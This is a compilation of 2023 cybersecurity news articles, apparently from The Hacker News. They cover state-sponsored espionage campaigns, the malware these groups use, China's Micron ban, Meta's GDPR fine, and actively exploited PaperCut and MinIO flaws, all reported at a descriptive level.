China has banned U.S. chip maker Micron from selling its products to Chinese companies working on key infrastructure projects, citing national security risks.
The development comes nearly two months after the country's cybersecurity authority initiated a probe in late March 2023 to assess potential network security risks.
"The purpose of this network security review of Micron's products is to prevent product network security problems from endangering the security of national critical information infrastructure, which is a necessary measure to maintain national security," the Cyberspace Administration of China (CAC) said.
The CAC further said the investigation found "serious cybersecurity problems" in Micron's products, endangering the country's critical information infrastructure supply chain.
As a result, operators involved in such critical information infrastructure projects should stop purchasing products from Micron, it added.
The authority did not disclose the specific cybersecurity concerns posed by Micron, but cited violations of local laws and regulations.
In a statement shared with the Wall Street Journal, Micron said it's "evaluating the conclusion and assessing our next steps." The restrictions "have no basis in fact," the U.S. Commerce Department was quoted as saying to BBC.
The tit-for-tat development comes amid escalating geopolitical tensions between China and the U.S., and mirrors similar moves made by the U.S. government against Chinese equipment makers over security concerns.
E.U. Regulators Hit Meta with Record $1.3 Billion Fine for Data Transfer Violations
24.5.23 BigBrothers The Hacker News
Facebook's parent company Meta has been fined a record $1.3 billion by European Union data protection regulators for transferring the personal data of users in the region to the U.S.
In a binding decision taken by the European Data Protection Board (EDPB), the social media giant has been ordered to bring its data transfers into compliance with the GDPR and delete unlawfully stored and processed data within six months.
Additionally, Meta has been given five months to suspend any future transfer of Facebook users' data to the U.S. Instagram and WhatsApp, which are also owned by the company, are not subject to the order.
"The EDPB found that Meta IE's infringement is very serious since it concerns transfers that are systematic, repetitive, and continuous," Andrea Jelinek, EDPB Chair, said in a statement.
"Facebook has millions of users in Europe, so the volume of personal data transferred is massive. The unprecedented fine is a strong signal to organizations that serious infringements have far-reaching consequences."
European data protection authorities have repeatedly emphasized the lack of equivalent privacy protections as that of GDPR in the U.S., potentially allowing American intelligence services to access data belonging to Europeans by virtue of them being shipped to servers located in the U.S.
The ruling stems from a legal complaint filed by Austrian privacy activist Maximilian Schrems, the founder of NOYB, almost a decade ago in June 2013 over concerns that E.U. user data is not sufficiently safeguarded from U.S. mass surveillance programs when transferred across the Atlantic.
"The simplest fix would be reasonable limitations in U.S. surveillance law," Schrems said. "There is an understanding on both sides of the Atlantic that we need probable cause and judicial approval of surveillance.
"It would be time to grant these basic protections to E.U. customers of U.S. cloud providers. Any other big U.S. cloud provider, such as Amazon, Google or Microsoft could be hit with a similar decision under E.U. law."
"Meta plans to rely on the new deal for transfers going forward, but this is likely not a permanent fix," Schrems further added. "In my view, the new deal has maybe a ten percent chance of not being killed by the CJEU. Unless U.S. surveillance laws get fixed, Meta will likely have to keep E.U. data in the E.U."
Schrems also accused the Irish Data Protection Commission (DPC) of consistently attempting to block the case from going forward and trying to shield Meta from being slapped with a fine and having to delete the data that has been already transferred, the latter two of which have been overturned by the EDPB.
Meta, in response, said it intends to appeal the ruling, calling the fine "unjustified and unnecessary" and that there is a "fundamental conflict of law" between the U.S. government's rules on access to data and European privacy rights.
"Without the ability to transfer data across borders, the internet risks being carved up into national and regional silos, restricting the global economy and leaving citizens in different countries unable to access many of the shared services we have come to rely on," Meta's Nick Clegg and Jennifer Newstead said.
Last year, the company warned that if ordered to suspend transfers to the U.S., it may have to stop offering "a number of our most significant products and services" in the E.U. According to the Wall Street Journal, a new trans-Atlantic data transfer deal is expected to be finalized as a replacement for the Privacy Shield later this year.
The fine constitutes the largest ever imposed under the E.U.'s GDPR privacy laws, eclipsing the €746 million ($886.6 million at the time) fine previously doled out to Amazon in July 2021 for similar privacy violations.
The development also marks the third monetary penalty issued by the DPC this year alone. In January, the watchdog levied a fine of €390 million over its mishandling of user information to serve ads in Facebook and Instagram.
Two weeks later, it was fined €5.5 million for violating data protection laws by compelling its users to "consent to the processing of their personal data for service improvement and security" and "making the accessibility of its services conditional on users accepting the updated Terms of Service."
Bad Magic's Extended Reign in Cyber Espionage Goes Back Over a Decade
24.5.23 BigBrothers The Hacker News
New findings about a hacker group linked to cyber attacks targeting companies in the Russo-Ukrainian conflict area reveal that it may have been around for much longer than previously thought.
The threat actor, tracked as Bad Magic (aka Red Stinger), has not only been linked to a fresh sophisticated campaign, but also to an activity cluster that first came to light in May 2016.
"While the previous targets were primarily located in the Donetsk, Luhansk, and Crimea regions, the scope has now widened to include individuals, diplomatic entities, and research organizations in Western and Central Ukraine," Russian cybersecurity firm Kaspersky said in a technical report published last week.
The campaign is characterized by the use of a novel modular framework codenamed CloudWizard, which features capabilities to take screenshots, record microphone, log keystrokes, grab passwords, and harvest Gmail inboxes.
Bad Magic was first documented by the company in March 2023, detailing the group's use of a backdoor called PowerMagic (aka DBoxShell or GraphShell) and a modular framework dubbed CommonMagic in attacks targeting Russian-occupied territories of Ukraine.
Then earlier this month, Malwarebytes revealed at least five waves of espionage attacks mounted by the group dating back to December 2020.
The deeper insight shared by Kaspersky connects Bad Magic to prior activity based on combing through historical telemetry data, allowing the company to identify various artifacts associated with the CloudWizard framework from 2017 to 2020.
The initial access vector used to drop the first-stage installer is currently unknown. That said, the malware is configured to drop a Windows service ("syncobjsup.dll") and a second file ("mods.lrc"), which, in turn, contains three different modules to harvest and exfiltrate sensitive data.
The information is transmitted in encrypted form to an actor-controlled cloud storage endpoint (OneDrive, Dropbox, or Google Drive). A web server is used as a fallback mechanism in the event none of the services are accessible.
Kaspersky said it identified source code overlaps between an older version of CloudWizard and another malware known as Prikormka, which was discovered by Slovak cybersecurity company ESET in 2016.
Image Source: ESET
The espionage campaign, monitored by ESET under the moniker Operation Groundbait, primarily singled out anti-government separatists in Donetsk and Luhansk and Ukrainian government officials, politicians, and journalists.
Prikormka is deployed via a dropper contained within malicious email attachments and features 13 different components to harvest various kinds of data from compromised machines. Evidence gathered by ESET shows that the malware has been selectively used since at least 2008.
CloudWizard also exhibits resemblances with a related intrusion set called BugDrop that was disclosed by CyberX (which has since been acquired by Microsoft) in 2017, with the industrial cybersecurity company describing it as more advanced than Groundbait.
Commonalities have also been unearthed between CloudWizard and CommonMagic, including identical source code and victimology patterns, indicating that the threat actor has been repeatedly tweaking its malware arsenal and infecting targets for about 15 years.
The latest development, in attributing the CloudWizard framework to the actor behind Operation Groundbait and Operation BugDrop, provides yet another piece to the puzzle that hopes to eventually reveal the bigger picture of the mysterious group's origins.
"The threat actor responsible for these operations has demonstrated a persistent and ongoing commitment to cyber espionage, continuously enhancing their toolset and targeting organizations of interest for over 15 years," Kaspersky researcher Georgy Kucherin said.
"Geopolitical factors continue to be a significant motivator for APT attacks and, given the prevailing tension in the Russo-Ukrainian conflict area, we anticipate that this actor will persist with its operations for the foreseeable future."
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
19.5.23 BigBrothers The Hacker News
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country.
"From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report.
The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023.
Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics.
What's more, the spike in malicious emails targeting Taiwan was followed by a 15x increase in PlugX detections between April 10 and April 12, 2023, indicating that the phishing lures acted as an initial access vector to drop additional payloads.
PlugX, a remote access trojan spotted in the wild since 2008, is a Windows backdoor that has been put to use by numerous Chinese threat actors to control victim machines. It's also known for employing DLL side-loading techniques to fly under the radar.
"This technique consists of a legitimate program loading a malicious dynamic link library (DLL) file that masquerades as a legitimate DLL file," Trellix researchers Daksh Kapur and Leandro Velasco said.
"This allows the execution of arbitrary malicious code bypassing security measures that look for malicious code running directly from an executable file."
Besides PlugX, Trellix said it also identified other malware families such as the Kryptik trojan as well as stealers like Zmutzy and FormBook targeting the nation.
That's not all. Some of the socially engineered messages contained links to seemingly innocuous login pages that mimic legitimate brands, including DHL, in an attempt to trick users into entering their credentials.
"In the past few years, we noticed that geopolitical conflicts are one of the main drivers for cyber attacks on a variety of industries and institutions," Joseph Tal, senior vice president of the Trellix Advanced Research Center, said.
"Monitoring geopolitical events can help organizations to predict cyber attacks in countries they operate in."
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
18.5.23 BigBrothers The Hacker News
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country.
"From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report.
The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023.
Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics.
What's more, the spike in malicious emails targeting Taiwan has been followed by a 15x increase in PlugX detections between April 10 and April 12, 2023, indicating that the phishing lures acted as an initial access vector to drop additional payloads.
PlugX, a remote access trojan spotted in the wild since 2008, is a Windows backdoor that has been put to use by numerous Chinese threat actors to control victim machines. It's also known for employing DLL side-loading techniques to fly under the radar.
Cyber Attacks
"This technique consists of a legitimate program loading a malicious dynamic link library (DLL) file that masquerades as a legitimate DLL file," Trellix researchers Daksh Kapur and Leandro Velasco said.
"This allows the execution of arbitrary malicious code bypassing security measures that look for malicious code running directly from an executable file."
Besides PlugX, Trellix said it also identified other malware families such as the Kryptik trojan as well as stealers like Zmutzy and FormBook targeting the nation.
"In the past few years, we noticed that geopolitical conflicts are one of the main drivers for cyber attacks on a variety of industries and institutions," Joseph Tal, senior vice president of the Trellix Advanced Research Center, said.
"Monitoring geopolitical events can help organizations to predict cyber attacks in countries they operate in."
State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered
17.5.23 BigBrothers The Hacker News
Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China.
This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News.
"The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said.
SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments.
The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore.
Earlier this February, Group-IB brought to light evidence that SideWinder may have targeted 61 government, military, law enforcement, and other organizations across Asia between June and November 2021.
More recently, the nation-state group was observed leveraging a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.
The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information.
Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload.
A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months.
Sidewinder Hacker
Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn[.]co).
Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov[.]org).
Further investigation into SideWinder's infrastructure has led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.
The rogue Android app passes off as a "Ludo Game" and prompts users to grant it access to contacts, location, phone logs, SMS messages, and calendar, effectively functioning as spyware capable of harvesting sensitive information.
Group-IB said the app also exhibits similarities with the fake Secure VPN app the company disclosed in June 2022 as being distributed to targets in Pakistan by means of a traffic direction system (TDS) called AntiBot.
In all, the domains point to SideWinder setting its sights on financial, government, and law enforcement organizations, as well as companies specializing in e-commerce and mass media in Pakistan and China.
"Like many other APT groups, SideWinder relies on targeted spear-phishing as the initial vector," the researchers said. "It is therefore important for organizations to deploy business email protection solutions that detonate malicious content."
U.S. Government Neutralizes Russia's Most Sophisticated Snake Cyber Espionage Tool
12.5.23 BigBrothers The Hacker News
The U.S. government on Tuesday announced the court-authorized disruption of a global network compromised by an advanced malware strain known as Snake wielded by Russia's Federal Security Service (FSB).
Snake, dubbed the "most sophisticated cyber espionage tool," is the handiwork of a Russian state-sponsored group called Turla (aka Iron Hunter, Secret Blizzard, SUMMIT, Uroburos, Venomous Bear, and Waterbug), which the U.S. government attributes to a unit within Center 16 of the FSB.
The threat actor has a track record of heavily focusing on entities in Europe, the Commonwealth of Independent States (CIS), and countries affiliated with NATO, with recent activity expanding its footprint to incorporate Middle Eastern nations deemed a threat to countries supported by Russia in the region.
"For nearly 20 years, this unit [...] has used versions of the Snake malware to steal sensitive documents from hundreds of computer systems in at least 50 countries, which have belonged to North Atlantic Treaty Organization (NATO) member governments, journalists, and other targets of interest to the Russian Federation," the Justice Department said.
"After stealing these documents, Turla exfiltrated them through a covert network of unwitting Snake-compromised computers in the United States and around the world."
The neutralization was orchestrated as part of an effort dubbed Operation MEDUSA by means of a tool created by the U.S. Federal Bureau of Investigation (FBI) codenamed PERSEUS that permitted the authorities to issue commands to the malware that caused it to "overwrite its own vital components" on infected machines.
The self-destruct instructions, engineered after decrypting and decoding the malware's network communications, caused the "Snake implant to disable itself without affecting the host computer or legitimate applications on the computer," the agency said.
Snake, according to an advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), is designed as a covert tool for long-term intelligence collection on high-priority targets, enabling the adversary to create a peer-to-peer (P2P) network of compromised systems across the world.
What's more, several systems in the P2P network served as relay nodes to route disguised operational traffic to and from Snake malware implanted on FSB's ultimate targets, making the activity challenging to detect.
The C-based cross-platform malware further employs custom communication methods to add a new layer of stealth and features a modular architecture that allows for an efficient way to inject or modify components to augment its capabilities and retain persistent access to valuable information.
"Snake demonstrates careful software engineering design and implementation, with the implant containing surprisingly few bugs given its complexity," CISA said, adding initial versions of the implant were developed around early 2004.
"The name Uroburos is appropriate, as the FSB cycled it through nearly constant stages of upgrade and redevelopment."
Infrastructure associated with the Kremlin-backed group has been identified in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, although its targeting is assessed to be more tactical, encompassing government networks, research facilities, and journalists.
Victimized sectors within the U.S. include education, small businesses, and media organizations, as well as critical infrastructure sectors such as government facilities, financial services, critical manufacturing, and communications.
Despite these setbacks, Turla remains an active and formidable adversary, unleashing an array of tactics and tools to breach its targets across Windows, macOS, Linux, and Android.
The development comes a little over a year after U.S. law enforcement and intelligence agencies disarmed a modular botnet known as Cyclops Blink controlled by another Russian nation-state actor referred to as Sandworm.
N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks
5.5.23 BigBrothers The Hacker News
e North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign.
"[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said.
Kimsuky is also known by the names APT43, ARCHIPELAGO, Black Banshee, Nickel Kimball, Emerald Sleet (previously Thallium), and Velvet Chollima.
Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe.
The latest intrusion set documented by SentinelOne leverages geopolitical themes related to North Korea's nuclear proliferation to activate the infection sequence.
"Notably, the spear-phishing emails are made with a level of design quality tuned for specific individuals, increasing the likelihood of opening by the target," the researchers said. "This includes proper formatting, grammar, and visual clues, appearing legitimate to unsuspecting users."
ReconShark
These messages contain links to booby-trapped Microsoft Word documents hosted on OneDrive to deploy ReconShark, which chiefly functions as a recon tool to execute instructions sent from an actor-controlled server. It's also an evolution of the threat actor's BabyShark malware toolset.
"It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator," Palo Alto Networks Unit 42 said in its analysis of BabyShark in February 2019.
ReconShark is specifically designed to exfiltrate details about running processes, deployed detection mechanisms and hardware information, suggesting that data gathered from the tool is used to carry out "precision attacks" involving malware tailored to the targeted environment in a manner that sidesteps detection.
The malware is also capable of deploying additional payloads from the server based on "what detection mechanism processes run on infected machines."
The findings add to growing evidence that the threat actor is actively shifting its tactics to get a foothold on compromised hosts, establish persistence, and stealthily gather intelligence for extended periods of time.
"The ongoing attacks from Kimsuky and their use of the new reconnaissance tool, ReconShark, highlight the evolving nature of the North Korean threat landscape," SentinelOne said.
Paperbug Attack: New Politically-Motivated Surveillance Campaign in Tajikistan
28.4.23 BigBrothers The Hacker News
A little-known Russian-speaking cyber-espionage group has been linked to a new politically-motivated surveillance campaign targeting high-ranking government officials, telecom services, and public service infrastructures in Tajikistan.
The intrusion set, dubbed Paperbug by Swiss cybersecurity company PRODAFT, has been attributed to a threat actor known as Nomadic Octopus (aka DustSquad).
"The types of compromised machines range from individuals' computers to [operational technology] devices," PRODAFT said in a deep dive technical report shared with The Hacker News. "These targets make operation 'Paperbug' intelligence-driven."
The ultimate motive behind the attacks is unclear at this stage, but the cybersecurity firm has raised the possibility that it could be the work of opposition forces within the country or, alternatively, an intelligence-gathering mission carried out by Russia or China.
Nomadic Octopus first came to light in October 2018 when ESET and Kaspersky detailed a series of phishing attacks mounted by the actor against several countries in Central Asia. The group is estimated to have been active since at least 2014.
The cyber offensives have involved the use of custom Android and Windows malware to strike a mix of high-value entities like local governments, diplomatic missions, and political bloggers, raising the possibility that the threat actor is likely involved in cyber surveillance operations.
The Windows malware, dubbed Octopus and which masqueraded as an alternative version of the Telegram messaging app, is a Delphi-based tool that allows the adversary to surveil victims, siphon sensitive data, and gain backdoor access to their systems via a command-and-control (C2) panel.
A subsequent analysis by Gcow Security in December 2019 highlighted the advanced persistent threat (APT) group's attacks against the Ministry of Foreign Affairs of Uzbekistan to deploy Octopus.
PRODAFT's findings are the result of the discovery of an operational environment managed by Nomadic Octopus since 2020, making Paperbug the first campaign orchestrated by the group since Octopus.
According to data gathered by the company, the threat actor managed to gain access to a telecommunication firm network, before moving laterally to over a dozen targets focusing on government networks, executives, and OT devices with publicly known vulnerabilities. Exactly how and when the telecommunication network was infiltrated is unknown.
"Operation Paperbug aligns with the common trend of attacking into Central Asia government infrastructure that recently became more prominent," PRODAFT noted.
Nomadic Octopus is believed to exhibit some level of cooperation with another Russian nation-state actor known as Sofacy (aka APT28, Fancy Bear, Forest Blizzard, or FROZENLAKE), based on victimology overlaps.
The latest attacks further entailed the use of an Octopus variant that comes with features to take screenshots, run commands remotely, and download and upload files to and from the infected host to a remote server. One such artifact was uploaded to VirusTotal on April 1, 2021.
A closer look at the command-and-control (C2) server reveals that the group managed to successfully backdoor a total of 499 systems as of January 27, 2022, some of which include government network devices, gas stations, and a cash register.
The group, however, doesn't seem to possess advanced toolsets or be too concerned about covering their tracks on victim machines despite the high-stakes nature of the attacks.
"As they operate on the compromised machines to steal information, they sometimes inadvertently caused permission pop-ups on victim computers, which resulted in suspicion from the victim," the company pointed out. "However, this was resolved due to the group diligently naming the files they transfer as benign and inconspicuous programs."
The same tactic extends to naming their malicious tools as well, what with the group camouflaging them as popular web browsers such as Google Chrome, Mozilla Firefox, and Yandex to fly under the radar.
That having said, Paperbug attack chains are largely characterized by the use of public offensive tools and generic techniques, effectively acting as a "cloak" for the group and making attribution a lot more challenging.
"This imbalance between the operator skills and importance of the mission might indicate that the operators have been recruited by some entity which provided them a list of commands that need to be executed on each machine exactly," PRODAFT said, adding "the operator follows a checklist and is forced to stick to it."
Iranian Hackers Launch Sophisticated Attacks Targeting Israel with PowerLess Backdoor
25.4.23 BigBrothers The Hacker News
An Iranian nation-state threat actor has been linked to a new wave of phishing attacks targeting Israel that's designed to deploy an updated version of a backdoor called PowerLess.
Cybersecurity firm Check Point is tracking the activity cluster under its mythical creature handle Educated Manticore, which exhibits "strong overlaps" with a hacking crew known as APT35, Charming Kitten, Cobalt Illusion, ITG18, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda.
"Like many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains," the Israeli company said in a technical report published today.
Active since at least 2011, APT35 has cast a wide net of targets by leveraging fake social media personas, spear-phishing techniques, and N-day vulnerabilities in internet-exposed applications to gain initial access and drop various payloads, including ransomware.
The development is an indication that the adversary is continuously refining and retooling its malware arsenal to expand their functionality and resist analysis efforts, while also adopting enhanced methods to evade detection.
The attack chain documented by Check Point begins with an ISO disk image file that makes use of Iraq-themed lures to drop a custom in-memory downloader that ultimately launches the PowerLess implant.
The ISO file acts as a conduit to display a decoy document written in Arabic, English, and Hebrew, and purports to feature academic content about Iraq from a legitimate non-profit entity called the Arab Science and Technology Foundation (ASTF), indicating that the research community may have been the target of the campaign.
Iranian Hackers
The PowerLess backdoor, previously spotlighted by Cybereason in February 2022, comes with capabilities to steal data from web browsers and apps like Telegram, take screenshots, record audio, and log keystrokes.
"While the new PowerLess payload remains similar, its loading mechanisms have significantly improved, adopting techniques rarely seen in the wild, such as using .NET binary files created in mixed mode with assembly code," Check Point said.
"PowerLess [command-and-control] communication to the server is Base64-encoded and encrypted after obtaining a key from the server. To mislead researchers, the threat actor actively adds three random letters at the beginning of the encoded blob."
The cybersecurity firm said it also discovered two other archive files used as part of a different intrusion set that shares overlaps with the aforementioned attack sequence owing to the use of the same Iraq-themed PDF file.
Further analysis has revealed that the infection chains arising from these two archive files culminate in the execution of a PowerShell script that's engineered to download two files from a remote server and run them.
"Educated Manticore continues to evolve, refining previously observed toolsets and delivering mechanisms," Check Point said, adding "the actor adopts popular trends to avoid detection" and keeps "developing custom toolsets using advanced techniques."
"Because it is an updated version of previously reported malware, [...] it is important to note that it might only represent the early stages of infection, with significant fractions of post-infection activity yet to be seen in the wild."
Russian Hackers Tomiris Targeting Central Asia for Intelligence Gathering
25.4.23 BigBrothers The Hacker News
The Russian-speaking threat actor behind a backdoor known as Tomiris is primarily focused on gathering intelligence in Central Asia, fresh findings from Kaspersky reveal.
"Tomiris's endgame consistently appears to be the regular theft of internal documents," security researchers Pierre Delcher and Ivan Kwiatkowski said in an analysis published today. "The threat actor targets government and diplomatic entities in the CIS."
The Russian cybersecurity firm's latest assessment is based on three new attack campaigns mounted by the hacking crew between 2021 and 2023.
Tomiris first came to light in September 2021 when Kaspersky highlighted its potential connections to Nobelium (aka APT29, Cozy Bear, or Midnight Blizzard), the Russian nation-state group behind the SolarWinds supply chain attack.
Similarities have also been unearthed between the backdoor and another malware strain dubbed Kazuar, which is attributed to the Turla group (aka Krypton, Secret Blizzard, Venomous Bear, or Uroburos).
Spear-phishing attacks mounted by the group have leveraged a "polyglot toolset" comprising a variety of low-sophistication "burner" implants that are coded in different programming languages and repeatedly deployed against the same targets.
Besides using open source or commercially available offensive tools like RATel and Warzone RAT (aka Ave Maria), the custom malware arsenal used by the group falls into one of the three categories: downloaders, backdoors, and information stealers -
Telemiris - A Python backdoor that uses Telegram as a command-and-control (C2) channel.
Roopy - A Pascal-based file stealer that's designed to hoover files of interest every 40-80 minutes and exfiltrate them to a remote server.
JLORAT - A file stealer written in Rust that gathers system information, runs commands issued by the C2 server, upload and download files, and capture screenshots.
Kaspersky's investigation of the attacks has further identified overlaps with a Turla cluster tracked by Google-owned Mandiant under the name UNC4210, uncovering that the QUIETCANARY (aka TunnusSched) implant had been deployed against a government target in the CIS by means of Telemiris.
"More precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy," the researchers explained.
"These efforts were thwarted by security products, which led the attacker to make repeated attempts, from various locations on the filesystem. All these attempts ended in failure. After a one-hour pause, the operator tried again at 07:19 UTC, this time using a TunnusSched/QUIETCANARY sample. The TunnusSched sample was blocked as well."
That said, despite the potential ties between the two groups, Tomiris is said to be separate from Turla owing to differences in their targeting and tradecrafts, once again raising the possibility of a false flag operation.
On the other hand, it's also highly probable that Turla and Tomiris collaborate on select operations or that both the actors rely on a common software provider, as exemplified by Russian military intelligence agencies' use of tools supplied by a Moscow-based IT contractor named NTC Vulkan.
"Overall, Tomiris is a very agile and determined actor, open to experimentation," the researchers said, adding "there exists a form of deliberate cooperation between Tomiris and Turla."
Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers
24.4.23 BigBrothers The Hacker News
Print management software provider PaperCut said that it has "evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro.
"PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC," it further added.
The update comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw (CVE-2023-27350, CVSS score: 9.8) in PaperCut MF and NG to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote management and maintenance (RMM) software like Atera and Syncro for persistent access and code execution on the infected hosts.
Additional infrastructure analysis has revealed the domain hosting the tools – windowservicecemter[.]com – was registered on April 12, 2023, also hosting malware like TrueBot, although the company said it did not directly detect the deployment of the downloader.
TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical links with Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.
"While the ultimate goal of the current activity leveraging PaperCut's software is unknown, these links (albeit somewhat circumstantial) to a known ransomware entity are concerning," Huntress researchers said.
"Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment."
Users are recommended to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11, and 22.0.9) as soon as possible, regardless of whether the server is "available to external or internal connections," to mitigate potential risks.
Customers who are unable to upgrade to a security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IPs and limiting IP addresses to only those belonging to verified site servers.
CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug
22.4.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The three vulnerabilities are as follows -
CVE-2023-28432 (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability
CVE-2023-27350 (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control Vulnerability
CVE-2023-2136 (CVSS score - TBD) - Google Chrome Skia Integer Overflow Vulnerability
"In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure," MinIO maintainers said in an advisory published on March 21, 2023.
Data gathered by GreyNoise shows that as many as 18 unique malicious IP addresses from the U.S., the Netherlands, France, Japan, and Finland have attempted to exploit the flaw over the past 30 days.
The threat intelligence company, in an alert published late last month, also noted how a reference implementation provided by OpenAI for developers to integrate their plugins to ChatGPT relied on an older version of MinIO that's vulnerable to CVE-2023-28432.
"While the new feature released by OpenAI is a valuable tool for developers who want to access live data from various providers in their ChatGPT integration, security should remain a core design principle," GreyNoise said.
Also added to the KEV catalog is a critical remote code execution bug affecting PaperCut print management software that allows remote attackers to bypass authentication and run arbitrary code.
The vulnerability has been addressed by the vendor as of March 8, 2023, with the release of PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9. Zero Day Initiative, which reported the issue on January 10, 2023, is expected to release additional technical details on May 10, 2023.
According to an update shared by the Melbourne-based company earlier this week, evidence of active exploitation of unpatched servers emerged in the wild around April 18, 2023.
Cybersecurity firm Arctic Wolf said it "has observed intrusion activity associated with a vulnerable PaperCut Server where the RMM tool Synchro MSP was loaded onto a victim system."
Lastly added to the list of actively exploited flaws is a Google Chrome vulnerability affecting the Skia 2D graphics library that could enable a threat actor to perform a sandbox escape via a crafted HTML page.
Federal Civilian Executive Branch (FCEB) agencies in the U.S. are recommended to remediate identified vulnerabilities by May 12, 2023, to secure their networks against active threats.
Daggerfly Cyberattack Campaign Hits African Telecom Services Providers
20.4.23 BigBrothers The Hacker News
Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda.
The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software."
Daggerfly's use of the MgBot loader (aka BLame or MgmBot) was spotlighted by Malwarebytes in July 2020 as part of phishing attacks aimed at Indian government personnel and individuals in Hong Kong.
According to a profile published by Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot as well as other tools like Cobalt Strike, a legitimate adversary simulation software, and an Android-based remote access trojan (RAT) named KsRemote.
The group is suspected to conduct espionage activities against domestic human rights and pro-democracy advocates and nations neighboring China as far back as 2014.
Attack chains analyzed by Symantec show the use of living-off-the-land (LotL) tools like BITSAdmin and PowerShell to deliver next-stage payloads, including a legitimate AnyDesk executable and a credential harvesting utility.
The threat actor subsequently moves to set up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which comes with a wide range of plugins to harvest browser data, log keystrokes, capture screenshots, record audio, and enumerate the Active Directory service.
"All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines," Symantec said. "The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering."
